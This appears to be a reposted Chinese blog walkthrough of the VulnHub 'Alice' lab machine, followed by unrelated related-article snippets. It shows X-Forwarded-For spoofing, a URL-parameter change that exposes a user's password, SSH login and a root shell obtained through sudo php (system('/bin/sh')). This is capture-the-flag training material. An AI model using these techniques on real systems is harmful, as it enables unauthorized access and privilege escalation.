VulnHub Alice

news2024/11/20 13:44:41

一、信息收集

发现开发了22、80

2.访问ip,右击查看源代码

发现需要利用X-Forwarded-For

火狐插件:X-Forwarded-For Header

挂上代理后:

出现以下页面:

先注册一个账户,然后再登录

发现有参数进行传参

发现传参,参数为5的时候,出现主角alice

查看密码:把type删掉

发现密码是:4lic3

二、漏洞利用

1.ssh连接

账号:alice
密码:4lic3

2.flag1

alice@gfriEND:~$ cd .my_secret/

alice@gfriEND:~/.my_secret$ ls
flag1.txt  my_notes.txt

alice@gfriEND:~/.my_secret$ cat flag1.txt

alice@gfriEND:~/.my_secret$ cat my_notes.txt

三、php回调bash提权

提权网站:

GTFOBins icon-default.png?t=N7T8https://gtfobins.github.io/sudo -l 查看哪些可以sudo提权

可以看到有个php有root权限可以利用

3.flag2


sudo php -r "system('/bin/sh');"

python3 -c 'import pty; pty.spawn("/bin/bash")'  #python交互式shell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1098758.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

网站如何有效防止网络攻击

互联网上的网站和应用程序受到各种威胁,如黑客、恶意软件和数据泄漏。因此,了解如何解决网站被攻击的问题至关重要。本文将介绍一些简单的步骤,帮助您提高您的网站的安全性。 确认攻击 要解决网站被攻击的问题,首先需要识别是否遭…

MES管理系统的设计与实施

随着制造业的快速发展,MES生产管理系统逐渐成为企业提高生产效率和管理水平的重要工具。然而,在实施MES管理系统的过程中,如何确保其有效性和可持续性成为了一个亟待解决的问题。本文将从以终为始、自我完善与适应变化三个方面探讨MES管理系统…

数据结构与算法课后题-第五章(树、森林)

1、 2、 3、 4、 5、 6、 7、 8、 9、

Studio One6.5最新版本新增了对Linux的支持

音乐制作人们,这是你们翘首以待的消息。数字音频工作站(DAW)已经成为音乐制作专业人士重要工具之一。 遗憾的是,对于 Linux 用户而言,选择十分有限。最受欢迎的选择通常是开源 DAW,如 Ardour、Audacity和闭…

SSM - Springboot - MyBatis-Plus 全栈体系(二十九)

第六章 SpringBoot 五、SpringBoot3 整合 MyBatis 1. MyBatis 整合步骤 导入依赖:在您的 Spring Boot 项目的构建文件(如 pom.xml)中添加 MyBatis 和数据库驱动的相关依赖。例如,如果使用 MySQL 数据库,您需要添加 …

Pulsar Manager配置自定义认证插件访问

Pulsar Manager配置自定义认证插件访问 Pulsar Manager和dashboard部署和启用认证 pulsar自定义认证插件开发 前面博客讲了以token方式访问pulsar 这节博客讲如何配置自定义认证插件的方式访问pulsar #启动pulsar-manager docker run --name pulsar-manager -dit \-p 9527:…

C# Winform编程(3)对话框

C# Winform编程(3)对话框 Show(string text);Show(string text, string caption);Show(string text, string caption, MessageBoxButtons buttons);Show(string text, string caption, MessageBoxButtons buttons, MessageBoxIcon icon); using System;…

UE5发布Android屏幕适配实践(Blueprint)

之前发了一个文章UE5屏幕适配,后续做项目中又遇到问题,对DPI Scale又有了理解,所以又写了这篇文章。https://mp.csdn.net/mp_blog/creation/editor/133337134https://mp.csdn.net/mp_blog/creation/editor/133337134 DPI Scale Rule使用Short…

Linux:将mysql数据导入mongodb

mysql和mongodb都要同时开启 进入mysql创建一个数据库为aaa create database aaa; 创建一个tarro表结构为 (id int,name varchar(20)) create table tarro(id int,name varchar(20)); 插入几个数据,等会把这里的数据导过去 insert in…

Java多线程解密:揭秘多线程的奥秘,给你全面了解与实践的权威指南

一:进程与线程 概述:几乎任何的操作系统都支持运行多个任务,通常一个任务就是一个程序,而一个程序就是一个进程。当一个进程运行时,内部可能包括多个顺序执行流,每个顺序执行流就是一个线程。 进程&#…

Python学习基础笔记七十二——IDE集成开发环境

集成开发环境,英文缩写是IDE。 IDE可以帮你更高效地开发项目代码。因为它提供了非常实用的功能,比如项目文件管理、语法高亮、代码导航、自动补齐代码、语法静态检查、调试、版本控制等等。 两款IDE:Pycharm和VSCode。 pycharm中的代码文件都…

香港学界呼吁RWA“在港先发”,构建基于港元稳定币的Web3生态!

2023年以来,市场对于RWA(Real World Assets)即真实世界资产“代币化”的讨论愈发频繁,一些观点认为 RWA将在下一轮加密资产牛市中成为焦点,部分Web3创业者和传统金融企业也快速将业务方向瞄准相关赛道,而被…

Java|学习|异常

1.异常 1.1 异常 1.1.1 概述 异常:就是程序出现了不正常的情况。 Error:严重问题,不需要处理。 Exception:称为异常类,它表示程序本身可以处理的问题。 RuntimeException:在编译器不检查,出…

WorkPlus即时通讯办公软件,助力企业实现移动化办公

在移动互联网的时代背景下,企业对于高效的移动平台需求日益迫切。WorkPlus作为领先品牌,致力于为企业打造卓越的移动平台,助力企业实现协作与效率的突破。本文将探讨WorkPlus如何通过其专业的解决方案,为企业打造无限可能的移动办…

高级系统架构设计师_笔记_真题

2020 科目一 位示图的计算 分页管理-页式存储 软件系统的文档可以分为用户文档和系统文档两类。软件活动: 对应软件开发的各种活动,软件开发工具包括:需求分析工具、设计工具、编码和排错工具、测试工具等。按需求描述定义的方法可将需求分…

day35

今日内容概要 Socket抽象层(socket编程) 基于TCP协议的借助socket可以编程客户端和服务端的程序 链接循环 通信循环 基于UDP协议的套接字(socket)编程 粘包现象 如何解决粘包现象(重要的是解决的思路) struct模块的使用(打包、解包) 今日内容详细 Socket抽象层&#x…

论文阅读:Rethinking Range View Representation for LiDAR Segmentation

来源ICCV2023 0、摘要 LiDAR分割对于自动驾驶感知至关重要。最近的趋势有利于基于点或体素的方法,因为它们通常产生比传统的距离视图表示更好的性能。在这项工作中,我们揭示了建立强大的距离视图模型的几个关键因素。我们观察到,“多对一”…

Linux:mongodb数据库基础操作(3.4版本)

安装 3.*版本和4.*版本安装都是一样的 Linux:mongodb数据库源码包安装(4.4.25版本)_鲍海超-GNUBHCkalitarro的博客-CSDN博客https://blog.csdn.net/w14768855/article/details/133826626?spm1001.2014.3001.5501 mysql和mongodb对比 登录…

【SpringCloud-10】SCA-nacos

前言: 前面介绍的springcloud,可以看做第一代,称为:SCN(spring cloud Netflix); 接下来介绍的是第二代:SCA(spring cloud alibaba); SCA主要有以下组件&#…

【Java 进阶篇】创建 JavaScript 轮播图:让网页焕发生机

欢迎大家来到本篇博客,今天我们将一起探讨如何使用 JavaScript 创建一个精美的轮播图。轮播图是现代网站设计的关键元素之一,它能够使网页更加吸引人,提高用户体验。无需担心,本文将面向基础小白,从头开始解释每一步。…